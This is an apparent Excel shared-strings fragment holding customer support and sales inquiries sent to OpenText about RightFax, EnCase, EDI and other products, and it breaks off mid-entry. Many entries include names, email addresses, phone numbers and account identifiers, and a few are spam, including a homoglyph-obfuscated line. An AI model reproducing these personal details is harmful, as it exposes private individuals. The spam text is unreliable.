  <si>
    <t xml:space="preserve">Hello.  I am reaching out to see if RightFax is a supported faxing option for Meditech.  We are currently using a different vendor to fax medical records out of Meditech, but we also have RightFax and are curious if we might could eliminate multiple vendors._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Karen Hopper  </t>
  </si>
  <si>
    <t>We currently have multiple Encase licenses.  We are re-structuring our company and changing from a California corporation (Kivu Consulting, Inc.) to a Delaware Corp (Kivu Consulting LLC).  Do we need to formally re-assign our licenses to the new corporate entity?  If so, what does that involve?  And how quickly can it be accomplished?</t>
  </si>
  <si>
    <t>I think my company has an account to log into your website, but because of people changes, the person who knew it is gone and I need to recover whatever account info we have with you.  I have taken over for Michael Clavin, whose name it may be registered under.  My company is...._x000D_
Teknia Group (Formerly Orchid)_x000D_
94 Belinda Parkway _x000D_
Mt Juliet TN 37122</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
I Need to contact someone who looks after Sound United division and needed help with EDI question that I have for  Sound united trading partners.  </t>
  </si>
  <si>
    <t>I wanted to learn more about your open text fax solutions. We have some faxing now but we're looking at other options. I was referred to opentext by a network admin at another company. Please let me know when we can chat - Jose</t>
  </si>
  <si>
    <t xml:space="preserve">We are we are looking to purchase a large number of the T356789iu - Tableau Forensic Universal Bridges. Can you please contact me to have a discussion. </t>
  </si>
  <si>
    <t>Currently we have PDF image processing. We want to have additional option to accept xml/cxml and process invoice. Please let me know any document available to go thru._x000D_
Thanks</t>
  </si>
  <si>
    <t>Please put me in touch with the supervisor of Elvis Cabral or a different Regional Sales Manager.</t>
  </si>
  <si>
    <t>Hello, I need to update our contact information with you. The payment notifications are currently being sent to an employee who is no longer with the company. Please advise. Thank you and kind regards, Holly</t>
  </si>
  <si>
    <t xml:space="preserve">We have RightFax installed in our environment, but we require an upgrade and would like to engage professional services from your side.  Can we get a quote for this service? </t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText,_x000D_
I work for Canon USA as a design engineer for one of our products that has a connector that works with your product, RightFax.  With more customers being interesting with this solution I have found myself needing to develop a better understanding of the RightFax product in how it is used / configured for troubleshooting purpose.  With that said I was wondering if there is a version of the software that we can obtain for that purpose such as a NFR version or demo version and if so what cost would be involved.  I'm gathering this information in hopes to making a proposal  to my management team so that we can better support our customers that use the RightFax application.  </t>
  </si>
  <si>
    <t xml:space="preserve">Is Docs Open a contract management system as well or only a data repository?  For example, would I be able to send a document to my team and know what part of the document life cycle it's in and who has signed off/approved such document, etc.?  Thanks in advance. </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
ich schreibe im Auftrag eines großen Handelskonzerns der mit seiner aktuellen OCR Lösung unzufrieden ist und nach einer Alternative sucht. In diesem Zusammenhang würden wir gerne mit Ihnen morgen ab 10:30 Uhr ein Telefonat vereinbaren. Anschließend werden wir Ihnen unseren Fragenkatalog zuschicken, bei dem wir bis Freitag eine Antwort brauchen._x000D_
Bitte bestätigen Sie den morgigen Termin zum Telefonat._x000D_
Viele Grüße,_x000D_
Alexander Mendelson_x000D_
</t>
  </si>
  <si>
    <t>Hello, my Department purchased the passport for me in June/July 2018. I need to attend some more training in order to take advantage of the passport. Can you point me in the right direction as far as how I register for classes using the passport?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
 _x000D_
_x000D_
I'm looking to get in touch with someone in HR or the social committee in your Richmond Hill office to discuss a team building and fundraising initiative in the GTA to support improving the lives of children facing illness, disabilities and or emotional obstacles in Canada._x000D_
_x000D_
 _x000D_
_x000D_
Can you please provide me with his/her name and email/phone number to reach out to. I'd greatly appreciate it!_x000D_
_x000D_
 _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Andrea_x000D_
</t>
  </si>
  <si>
    <t>Why did your upgrade make your program so much more clunky and non-user friendly??  What took one step before now takes 3 or 4 steps (i.e. printing to PDF).  You went from a mediocre program to a hellish program that now makes my job take twice as long.  Please explain to me how this "upgrade" benefits the user?  What are the pros, because all I see are cons after cons...  Since the upgrade I will certainly NOT recommend your program to anyone.  Please, if you want continued business, fix this "upgrade" so that those of us who use it time and again on a daily business can actually get our work done on a timely basis.  All you have done is made the process more complicated and made it so the same process takes twice as long...</t>
  </si>
  <si>
    <t>Good morning, my name is Julián Pereyra. I'm need to know how much cost the encase forensic software, including how much time the license works when adquire this. Also with the software ¿We have the opportunity to perform mobile device forensic analysis?. On the other hand ¿How cost training for five people's?, and all this ¿Includes technical support on spanish?. Thanks for your time. I appreciate it and i wait for a response.</t>
  </si>
  <si>
    <t xml:space="preserve">when i go on GXS catalogue to enter my reset password, it still doesnt work. _x000D_
Network id: GU618  userid:GU618A _x000D_
</t>
  </si>
  <si>
    <t>We have opentext enterprise scan setup at one of our scan stations and one of the profiles we created we have the color depth set to 24bit and 200dpi but it throws an error everytime the paper goes through that "The action cannot be preformed because of the set color depth" Though it lets you continue and select "Yes" to continue has no issues after the scan the paper/scan shows up fine. Its just a pesty dialog box keeps popping up for each and every document that goes through. The scanner we are using is a fujitsu fi-6670. Not sure if you guys could help?</t>
  </si>
  <si>
    <t>We are looking for an AP Solution and wasn't sure what you have.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, We have recently moved to Microsoft O365 and realised that our version of RightFax isn't compatible with it. would you be able to advise what we need to do to upgrade this? _x000D_
_x000D_
_x000D_
thanks in advance,_x000D_
Matt </t>
  </si>
  <si>
    <t>Hello Madame / Sir,_x000D_
_x000D_
I’m Cloud Consultant collaborating for a consulting firm, we are looking to migrate "Actuate" software as SaaS cloud product._x000D_
_x000D_
For this concern, we request from you following details regarding the SaaS equivalent product of "Actuate" software: _x000D_
_x000D_
	Does SaaS equivalent product for "Actuate" software exist?_x000D_
	If the SaaS equivalent product exists, could you please provide cloud hosting datacenters locations? (inside EU borders or outside)_x000D_
	Also, If the SaaS equivalent product exists, could you please share with us the price brochure? _x000D_
        &gt; example : price per month / per service level / per number of users / per number of requests._x000D_
_x000D_
Looking forward to hearing from you,_x000D_
Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich schreibe im Auftrag eines großen Handelskonzerns der mit seiner aktuellen OCR Lösung unzufrieden ist und nach einer Alternative sucht. In diesem Zusammenhang würden wir gerne mit Ihnen morgen ab 10:30 Uhr ein Telefonat vereinbaren. Anschließend werden wir Ihnen unseren Fragenkatalog zuschicken, bei dem wir bis Freitag eine Antwort brauchen._x000D_
Bitte bestätigen Sie den morgigen Termin zum Telefonat._x000D_
Viele Grüße,_x000D_
Alexander Mendelson_x000D_
</t>
  </si>
  <si>
    <t>Could I have an account manager get in touch asap please.  I would like to update our StreamServe v4 environment to the latest version available.</t>
  </si>
  <si>
    <t>Daybreak Venture is looking into upgrading their hardware to a Power 9. Model: 9009-41A, Process Feature: EP10 (1 active processor) and Processor Group: P05. What would be the upgrade cost for your software? Thank you, Jeff. I attempted contacting this company through your website on January 28th and have not heard back from anyone.</t>
  </si>
  <si>
    <t>We had a contract with Hightail. When you purchased them, are we still able to use with the contract we had?_x000D_
 Our user name was under: suskoj@ellismedicine.org _x000D_
Jenny no longer works here. I just need some guidance on next steps for being able to continue using. Thank you._x000D_
Pat</t>
  </si>
  <si>
    <t>Hi, Wave Life would like to become a vendor. Can you please guide me on the right direction on how to apply? Thank you for your help</t>
  </si>
  <si>
    <t>Medsphere has a customer preparing to deploy RightFax and thus we would like to obtain access to RightFax in order to perform development work against. Further, we're interested in building robust support for RightFax and offering it as a supported fax solution integrated with our EHR.  Would like to explore both the possibility of a development license AND a possible partnership.</t>
  </si>
  <si>
    <t xml:space="preserve">I am inquiring about OpenText Gupta Team Developer TD 7_x000D_
_x000D_
What would the cost to purchase 2 licenses?_x000D_
What would be the annual support costs? _x000D_
_x000D_
Thank you,_x000D_
Shyanne Estey </t>
  </si>
  <si>
    <t>We are interested in your Documentum product as a solution to centralizing our AP department.  We need to be able to scan our vouchers and have them create a voucher within PeopleSoft</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am looking for software Exceed for windows version 11.0 software_x000D_
_x000D_
Do you have that ?_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Hello, i work for the IT service of "NLMK Strasbourg" company. We use edoc DM 5.3 and i would like to know if possible to don't launch automatically add-in "DMExcel 2010 and DMWorld2010" when someone start the application concerned (Word 2010 or Excel 2010)</t>
  </si>
  <si>
    <t>Not able to downloads Software like Encase Imager, Encase Processor Node. send the downloads as soon as possible</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Il me manque les factures de octobre et décembre._x000D_
N° client : 84852_x000D_
Cordialement.</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
I'm Joshua Osabel, a web security researcher._x000D_
_x000D_
Is there a way to submit a report for a security vulnerability on your site?_x000D_
_x000D_
If you don't have a bounty program, _x000D_
Do you also give a reward for a vulnerability that will be reported to your technical team?_x000D_
_x000D_
Your response would be highly appreciated._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Please can you assist me with the CPE credits.  I need to know if me working in a Forensic lab on Encase for the last two years add to my CPE points and if I am studying for a honours degree if that also counts to my CPE points </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich möchte sie bitten mir die Kontaktdaten eines Ansprechpartners aus Ihrem Hause zu nennen, der mir zu folgendem Thema Auskunft geben kann:_x000D_
Revisionssichere Kassenbelegarchivierung unter IBM OnDemand und der Auswertungsmöglichkeiten gem. T1-T3 aus SAP (R3/Hana)_x000D_
_x000D_
Herzlichen Dank_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Roger Janz</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know how does your “EDocs DM” program works because I have seen it in many legal firms. If it is an excellent tool I would like to have it in my law firm. </t>
  </si>
  <si>
    <t>When using the TX-1 and bookmarking a file path to our NAS the bookmark does not save when powering the TX-1 off.  Is this normal?  I really like the TX-1 but power it down when I'm not using it because of the fan noise.  The file path to our NAS is not short and it becomes very annoying to type the address every time.</t>
  </si>
  <si>
    <t>We need a Account to open Technical Support Ticket.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we are seeking software which could be responsible for document generation and delivery._x000D_
I'm interested in Customer Experience Management (CEM) software._x000D_
Could I get technical documentation or presentation about this software.</t>
  </si>
  <si>
    <t>Based in UK, I am currently investigating DMS and CRM systems with a view to procurement for the Investments team. Having read material on your website, do you have any more detailed information on your products, particularly document capture, especially from emails and Business network products as they may relate to keeping and linking documents related to specific assets (e.g. buildings and properties), companies (e.g. fund management companies) and individuals (e.g. individual fund managers)?</t>
  </si>
  <si>
    <t>we are looking for project of customer support. We are anew startup company in India</t>
  </si>
  <si>
    <t>Hi, I created a new account for OT KC and confirmed it via the link into the confirmation email. Unfortunately I am not able to get access to the contents of KC. Could you please help me?_x000D_
My company, iXenso AG, is an OpenText partner._x000D_
_x000D_
Best regards_x000D_
Sabine</t>
  </si>
  <si>
    <t>Dear Open Text,_x000D_
Can you please Forward this Information to you SAP technicans who can support the download of required files / Transports._x000D_
SAP incident has been opened (27150/2019) but not answered so far by OT._x000D_
 Thank you and Kind regards_x000D_
Donato Salamida_x000D_
_x000D_
 _x000D_
KSB SE &amp; Co. KGaA_x000D_
IT Applikationen Finanzen_x000D_
 _x000D_
Donato Salamida_x000D_
 _x000D_
Tel.: +49 6233 86 2555_x000D_
E-Mail: donato.salamida@ksb.com_x000D_
Text from SAP Incident: _x000D_
=================_x000D_
Dear Dennis,_x000D_
 _x000D_
a second Problem needs to be solved:_x000D_
 _x000D_
The following BC sets cannot be activated becaus they do not exist after the Installation in our System: _x000D_
 _x000D_
 _x000D_
/OTX/PS03_VIM_003_01_x000D_
/OTX/PS03_VIM_003_02_x000D_
 _x000D_
The following Addons have been installed: _x000D_
 _x000D_
OpenText Vendor Invoice Management SAP ERP Component 7.5 AddOn_x000D_
Service Packs 1 - 8 for OpenText Vendor Invoice Management SAP ERP Component 7.5 AddOn_x000D_
OpenText Vendor Invoice Management SAP ERP Component 7.5 HANA_x000D_
OpenText Business Center for SAP Solutions 16.3 Components_x000D_
 _x000D_
 _x000D_
According SAINT entries after the Installation: _x000D_
 _x000D_
OTBCBAS        0700_004          0002     OpenText Business Center Base_x000D_
OTBCFND        0700_004          0002     OpenText Business Center Foundation_x000D_
OTBCINB          0700_004          0002     OpenText Business Center Inbound_x000D_
OTBCSL00       0700_004          0002     OpenText Business Center Solution Base_x000D_
OTBCSL03       0700_004          0001     Open Text - Business Center Solution - V_x000D_
OTBCSL30       0700_004          0001     OpenText Business Center VIM Basic_x000D_
OTBCSL33       0700_004          0001     OpenText Business Center VIM Webservices_x000D_
OTBCUS03       0740_004          0003     Opentext Business Center VIM Web UI_x000D_
OTBCWSR       0740_004          0002     OpenText Business Center Webservices_x000D_
OTBCWUI         0740_004          0002     Opentext Business Center Web UI_x000D_
OTEXVIM         750       0008     Open Text Vendor Invoice Management_x000D_
OTVIMHNA       750       0000     Open Text Vendor Invoice Management - HANA Anteil_x000D_
 _x000D_
 _x000D_
Thank you</t>
  </si>
  <si>
    <t>Buenos días:_x000D_
_x000D_
El motivo de mi consulta es el siguiente, estamos interesados en adquirir un gestor documental para la empresa. No hemos visto ninguna herramienta, por este motivo, tampoco tenemos claro las posibilidades que nos ofrecen las mismas. A nuestro entender creo que será importante ir teniendo claros los siguientes puntos:_x000D_
_x000D_
•	Funcionalidades que nos puede ofrecer el sistema_x000D_
•	Manejo para el archivo cotidiano de expedientes de personal_x000D_
•	Infraestructura necesaria_x000D_
•	Sistema de indexación de los documentos, ubicación de los mismos, seguridad en cuanto a cumplimiento del RGPD_x000D_
•	Tipos de usuarios que pueden acceder al sistema_x000D_
•	Posibilidad de usuarios con acceso de solo lectura o acceso restringido (por ejemplo, según clasificación de documentos o empleados, directivos, etc.)_x000D_
•	Clasificación/Codificación de la documentación_x000D_
•	Mismo tipo de documento con distinta fecha, por ejemplo, contratos, altas SS, modelo 145, etc._x000D_
•	Búsqueda de documentación-Búsqueda extracción masiva de documentación, por ejemplo, contratos o altas en SS de ciertos colectivos_x000D_
•	Proceso de escaneo de documentos desde papel o subida de documentos ya en PDF_x000D_
•	Cierre de expedientes_x000D_
•	Posibilidad de reconocimiento de documentos por OCR_x000D_
•	Cierre de expedientes, bien desde la documentación o bien desde carga de datos del sistema maestro de información SAP_x000D_
•	Por último nos gustaría ver las posibilidades de la firma digital, principalmente para contratos._x000D_
_x000D_
Esperamos que con esta información, podáis mostrarnos las posibilidades de vuestra herramienta para que podamos comparar y valorar funcionalidad/coste de la misma._x000D_
_x000D_
Quedamos a la espera de vuestros comentarios y de poder ver una demostración del producto y presupuesto._x000D_
_x000D_
Un cordial saludo._x000D_
_x000D_
Importante: toda la información que envíen, por favor, que sea por correo electrónico, ya que el móvil me es imposible atenderlo. Toda la información que llegue la pasaré a mi jefe para que valore la propuesta y concerte cita con ustedes</t>
  </si>
  <si>
    <t xml:space="preserve">J’ai acheté un sondeur helix5 et je voudrais savoir comment activer le son plus fort des_x000D_
L.apparition du symbole poisson sur  l’ecran_x000D_
   Merci d’avance de me renseigner_x000D_
</t>
  </si>
  <si>
    <t>Hej! kan ni höra av er med förslag på Cloud Digital signerings lösning samt Digital signering av Autocad/Revit dwg 2D/3D ritning/modeller?_x000D_
med vänliga hälsningar_x000D_
Ulrik Ehrenroth</t>
  </si>
  <si>
    <t>Hello, I changed my contact e-mail in my profile from old address nsemakin@netwell.com.ua  to_x000D_
 my new e-mail nsemakin@nwu.com.ua (Netwell-Ukraine changed the domain from netwell to nwu)_x000D_
But after that, I lost my access to your Knowledge base.  Can you help me to revert this access?</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to reach out to Jacco van Gelder. Would it be possible for him to reach out to me by phone?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Jeroen van der Woude_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hinzufügen einer alternativen OCR Engine in unser Dokumenterkennungs Produkt.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I am trying to locate licenses purchased by iPSL (Intelligent Processing Solutions Ltd) for Hummingbird in 2007 and 2008 (via Insight) the number included the following: _x000D_
_x000D_
License Certificates I believe included 4113989 – 4114008 (inclusive)._x000D_
_x000D_
At the time the contact was Katy Street and she confirmed the licenses were register do you retain details of Hummingbird purchases and if so are you able to assist at all?_x000D_
_x000D_
Thanks, _x000D_
_x000D_
Jenaya_x000D_
</t>
  </si>
  <si>
    <t>Every time i click on the Knowledge base i get a form to confirm my email adress. After getting the mail and doing the confirmation i get the same form to confirm .... endless</t>
  </si>
  <si>
    <t>We are in the process of renewing our Rightfax License/Support which expires 06 March 2019._x000D_
_x000D_
Please provide us a list of authorized RightFax Partners (Reseller and Support) in Bahrain whom we can correspond.  _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Want to try to create accessible websites</t>
  </si>
  <si>
    <t xml:space="preserve">Приветствую Вас, меня зовут Андрей и я являюсь сертифицированным - Золотым партнером по CMS Bitrix и CRM Bitrix24. Так же есть друг и партнер по работе с CMS WordPress. _x000D_
 _x000D_
Если у вас имеются вопросы, смело пишите на почту: andrey.1cbitrix@gmail.com _x000D_
или звоните по номеру: +7 (925) 599-75-65 _x000D_
 _x000D_
Я и моя небольшая команда поможем выполнить любые работы по сайтам. _x000D_
 _x000D_
Осуществить техническую поддержку, модернизацию и обслуживание сайтов на Битриксе и WordPress. _x000D_
 _x000D_
ВАЖНО! На все, что мы делаем распространяется гарантия 12 месяцев. _x000D_
 _x000D_
Правда о нашей небольшой но эффективной команде : _x000D_
По итогам 2018 года мы повысили эффективность нашей работы и расширили спектр оказываемых услуг: _x000D_
Рейтинг разработчиков интернет-магазинов на WordPress - 4 место _x000D_
Рейтинг digital-агентств, работающих с крупнейшими компаниями (Телекоммуникации) - 7 место _x000D_
Рейтинг разработчиков интернет-магазинов в Москве - 22 место _x000D_
Рейтинг разработчиков интернет-магазинов на 1С-Битрикс - 35 место _x000D_
Рейтинг разработчиков интернет-магазинов в России - 47 место _x000D_
Рейтинг веб-студий в Москве - 141 место _x000D_
Ссылки предоставлю по запросу. _x000D_
 _x000D_
Я знаю, что битрикс дорогая система для обслуживания. _x000D_
Но у нас не Московские цены - гораздо ниже. _x000D_
 _x000D_
Кратко что мы можем: _x000D_
 _x000D_
МАКСИМАЛЬНАЯ ИНТЕГРАЦИЯ _x000D_
Настроим обмен сайта с 1С даже если нет официального модуля. Разработаем механизмы интеграции с CRM системами, товарными агрегаторами, службами доставки и службами оплаты _x000D_
 _x000D_
РАБОТА С КОНТЕНТОМ _x000D_
Обновление и размещение на сайте нового контента больше не будет проблемой. Такие операции как: публикация новостей, размещение статей, обновление каталога товаров и прайс-листов, размещение акций и спецпредложений мы берем на себя. _x000D_
 _x000D_
ПРОГРАММИРОВАНИЕ И ДОРАБОТКА САЙТА _x000D_
Поможем с доработкой текущего кода и написанием нового. Установим и внедрим модули с Marketplace или напишем собственные под ваши задачи. Проведем аудит кода и устраним все уязвимости, а также проведем автоматизацию ваших бизнес процессов _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are SAP Consulting firm based out of Bangalore,India. We wanted to partner with Open text on selling it along with our other SAP Solutions._x000D_
_x000D_
Please do revert back</t>
  </si>
  <si>
    <t>Hello,  I think we have something like support contract for ETX TurboX.  If so, please let me know how I can contact you and what is the SLA things?_x000D_
_x000D_
Thanks._x000D_
Regards,_x000D_
Koshiro</t>
  </si>
  <si>
    <t>One of our client would like to renew their Knox Manager License.  How can we get a quote?_x000D_
_x000D_
Apprecite for your info_x000D_
_x000D_
Best Regard,_x000D_
Nirwan</t>
  </si>
  <si>
    <t>How do I get the latest Enscripts for Encase v8.08?</t>
  </si>
  <si>
    <t>Hello, my Police Department purchased the annual passport last year around June/July. I attempted to log onto the opentext website but my email address is not recognized. Could you point me in the right direction?_x000D_
_x000D_
I have already taken DF120 and DF 210</t>
  </si>
  <si>
    <t>Looking for info</t>
  </si>
  <si>
    <t>úžasně Saᶆоⱬřeǰmostí je i ɗoроṛꭒĉоṿảní ṇeǰḅḷižšícḥ ṛеsṭaurací, hoṭeḷů ṇеḅo zastávек ᶆĕṣṭṣкé hrоmaɗṇé ɗорṛaⅴу.</t>
  </si>
  <si>
    <t xml:space="preserve">Hadron and it's discovery </t>
  </si>
  <si>
    <t>Hi Team_x000D_
Recently, we have had an issue with our RightFax service. We have been advised by one of our service partners that we a fax with few pages is send through to them from Outlook, they receive only a few pages (and not all the pages)but first page is garbled._x000D_
The Service partner have investigated the issue and said the issue is our end._x000D_
Please don't hesitate to contact us if you need more information.</t>
  </si>
  <si>
    <t>Interested in pricing for Right FAX. We receive 1000 FAXes per day... need to store for 10 years and distribute electronically to clerical staff. Healthcare organization.</t>
  </si>
  <si>
    <t>Just wanna know the way of making a contact with my area meeting partners</t>
  </si>
  <si>
    <t>Requesting a renewal quote for a RightFax agreement that will expire on 03/01/19.  Please contact me using the email address provided.  Thanks!</t>
  </si>
  <si>
    <t>We currently have an A104 unit that has been out of support for many years.  Unit functions well running the original FP1 software from 2011, however as we are moving to windows 10 installs we notice that the print to fax client for workstations doesn't work on w10.  Looking for options to replace with new equipment or if the unit is still receiving software/feature updates to renew support and get current if w10 clients are supported.  Which ever makes the most sense.  Thanks</t>
  </si>
  <si>
    <t>I am hoping to get a quote for your trading grid messaging service listed on page 31 in your product catalog.  Please let me know what other information you might need in order to send a quote.</t>
  </si>
  <si>
    <t xml:space="preserve">Question regarding invoices. </t>
  </si>
  <si>
    <t>Please cancel the trial evaluation effective today 2/5/2019</t>
  </si>
  <si>
    <t>Hi I'm trying to find out pricing for an OpenDeploy license</t>
  </si>
  <si>
    <t>Good Day_x000D_
_x000D_
We currently are using you Rightfax product in our sister company LANXESS in Pittsburgh._x000D_
Can you please tell me, if Rightfax will work with Office 365?</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently registered for 2 encase 120 Virtual training classes, one on March 5th and one at May 7th. Could you please remove the registration i have for May 7th so the only one i have left is March 5?_x000D_
_x000D_
Please contact me with any questions at jgaler@hagerty.com_x000D_
_x000D_
Thank you!_x000D_
Jon Galer </t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to access my account by requesting a new password. I keep getting the prompt that password attempt failed. I need install the software to a new computer. Thanks in advance for you help. </t>
  </si>
  <si>
    <t>I spent over 30 minutes today being transferred around customer service when inquiring about my user name and password originally established for EasyLink.  I was advised that nothing was found and that my fax # (404-601-6555) was owned by XO Communications.  I used a free standing fax machine to send a fax to my number and it was received in my e-mail from "support@easylink.com".  I have received other emails previously from this same entity.  I am very confused as to how this is coming from Easylink (or Opentext) when you are unable to tell me I have an account.  Can you assist?  Thank you.</t>
  </si>
  <si>
    <t>Can you tell if your company was just Fax2mail?  I am trying to find my account for 281-205-4850</t>
  </si>
  <si>
    <t>Necesito adquirir la ultima version del GUPTA report builder, como puedo hacer para comprarlo??</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We would like to update or upgrade to the latest version._x000D_
The currently installed version is RightFax Product suite 10.6.3_x000D_
_x000D_
Please provide information and download link._x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>How to apply for summerinternship in India?</t>
  </si>
  <si>
    <t>Dear team,_x000D_
_x000D_
We are urgently looking for the latest EnCase Endpoint Investigator installation resources. Would you please provide us with a link to the latest installer (8.08)._x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Kind regards,_x000D_
Maarten Beliën</t>
  </si>
  <si>
    <t>Our customer is asking us to send EDIFACT DESADV but they said They don't have a link by ANX. They are GXS as their VAN. I think ANX and GXS are now both Opentext. I think there should be no problem to send/receive documents. Could you please verify?_x000D_
_x000D_
Thanks and regards,_x000D_
_x000D_
Miho</t>
  </si>
  <si>
    <t>We would like you to participate in our RFP to onboard a DAM platform.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I would like to have a quote on the following products,_x000D_
_x000D_
1.	A HummingBird application “NFS Maestro Plus” which is a connectivity product for Trans4m into IFW (IDEAS)._x000D_
a.	Licensing for 10 clients_x000D_
2.	A HummingBird application “BiQuery” which is a data mining product for Trans4m._x000D_
a.	Licensing for 10 clients_x000D_
_x000D_
I’ve added some additional information which should help to identify us, (CPK Interior Products). We are currently a customer of OpenText and have your support for ANX Managed Services with Premium Plus Customer Service._x000D_
_x000D_
Our DUNS number is 24-850-3187_x000D_
Our Customer ID is 10453771_x000D_
Our End User is 10453771_x000D_
_x000D_
Would or could you also provide an account manager name as our contact point._x000D_
_x000D_
Thank you for your support._x000D_
_x000D_
Regards,_x000D_
_x000D_
Paul_x000D_
</t>
  </si>
  <si>
    <t>A small engineering department here at Cortec is interested in about 12 seats (licenses) of your product. I am a desktop support (IT) guy here.</t>
  </si>
  <si>
    <t>I keep getting fax messages and this is my home phone number 740 689 0678  Please block. I do NOT want you to keep calling  Thank you</t>
  </si>
  <si>
    <t>I am interested in taking the course 3-2022 Installation and Administration of OpenText Extended ECM for SAP Solutions._x000D_
The course is in English Virtual Classroom - Asia Pacific. What does the Aisa Pacific mean? Is that the timezone? Can I take the course even though I am in Canada?</t>
  </si>
  <si>
    <t>I am trying to determine if we already have an account with you. If so, we are looking to expand our services that we are receiving and need to discuss pricing and options.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear support team, my account was blocked. Appears that the password that I used to log in wasn't the correct one (was the one that I allways used). _x000D_
Could you please help to solve this situation? it's very urgent. _x000D_
</t>
  </si>
  <si>
    <t>Hello, I wanted to ask if OpenText offered an incentive travel program or conference annually for your top sales, managers or customers? If so, can you send me your planners name at your office to contact? Thank you_x000D_
_x000D_
Paul P. Butler</t>
  </si>
  <si>
    <t>Need to speak to someone about a fax server for 4-8 fax lines.</t>
  </si>
  <si>
    <t>NI</t>
  </si>
  <si>
    <t>I want to change my phone number to log in to ANX</t>
  </si>
  <si>
    <t xml:space="preserve">Tech support I tried to reset my password for the opentext website, unable to reset please assist, thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to purchase maintenance renewal on Redact-It </t>
  </si>
  <si>
    <t>I have a question about ETX 11.5. Is there a way to see the etx user accounts on the Linux Server that is running ETX? We are currently running Sles11sp3 for the server host for Exceed TurboX. Is there a file or directory structure that keeps that database to access from the command line instead of the web gui?</t>
  </si>
  <si>
    <t xml:space="preserve">Is there anywhere I can find documentation for configuring SCCM deployments of NativeSetup? Having issues configuring the installation for a silent install while accepting all default input.  Thank you. </t>
  </si>
  <si>
    <t>Looking to get estimate on Hybrid Cloud solution for Rightfax. Previously worked with _x000D_
Danja Munley</t>
  </si>
  <si>
    <t>When trying to login to the fax2mail virtual Fax machine I get an error that says fax2mail Db Error: Unable to add/update jobs to db.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in suitable class room/virtual training course for a SAP Functional Consultant and Developer in Exstream (Document Presentment) server. Please  me with response with course title, content, prerequisites (if any) and cost of each course for a individual. _x000D_
thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'm trying to apply for the Senior Financial Analyst role in Gaithersburg, MD on the site and it continues to tell me that my gmail account is already in the system.  When I try to login to the site, it says I don't have the correct password.  Also, it will not send me a link to reset my password so I'm struggling to get my application submitted.  Could somebody please help me with this?_x000D_
_x000D_
Thanks,_x000D_
Kurt</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
We are looking forward to buy open text product  XECM for SAP.  We want to know more about this product. Can someone call me back on 604-365-1731._x000D_
_x000D_
Thanks_x000D_
Glenu Mathai_x000D_
Solution Architect (IBM Contractor), DRMIS_x000D_
Department of National Defence / Government of Canada_x000D_
glenu.mathai@forces.gc.ca/ Tel: 613-996-6846/ Cell 604-365-1731_x000D_
architectes de solution _x000D_
Ministère de la Défense nationale / Gouvernement du Canada_x000D_
glenu.mathai@forces.gc.ca / Tél. : 613-996-6846_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi Guys,_x000D_
_x000D_
_x000D_
We recently sold an Endcase forensic license to an end customer, unfortunately, they lost the information sent with the instructions for installing and downloading the software. I already found the installation information in your site; but I have not found how to download the software to install it._x000D_
_x000D_
Could you please tell me what is the procedure to download the software?_x000D_
_x000D_
Aditional information:_x000D_
- They receive a security key (dongle)_x000D_
- We bought the product to Digital Intelligence_x000D_
_x000D_
Thanks a lot for your help.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in knowing more about the opentext-Magellan product features, usage in financial industry and pricing._x000D_
I would like to view a demo of the product._x000D_
Thanks,_x000D_
Vaibhav</t>
  </si>
  <si>
    <t xml:space="preserve">I repeatedly get errors stating i have not confirmed my account when attempting to access MySupport, despite having confirmed my account via the received email multiple times.  I have use multiple browsers , cleared cache, and used incognito mode.  </t>
  </si>
  <si>
    <t>We are looking to replace our subscription to Box with a more complete document management system. I need to know the minimum price for a subscription to OpenText to know whether to take a more detailed look at your platform. Currently, we pay $75/month for three managed users of Box services. We are a pre-revenue startup company at the moment but could start growing within the next 12 months.</t>
  </si>
  <si>
    <t>I no longer seem able to access the EnCase forums. I did have access until recently and I haven't changed anything._x000D_
When I try, I now receive this message;_x000D_
_x000D_
"Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Request Confirmation Email"_x000D_
_x000D_
I click on the 'Request Confirmation Email' button. I receive the email, follow the link in the email to confirm my account and I'm still sent back to the 'Almost there!' page so I'm stuck in a permanent loop.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear all,_x000D_
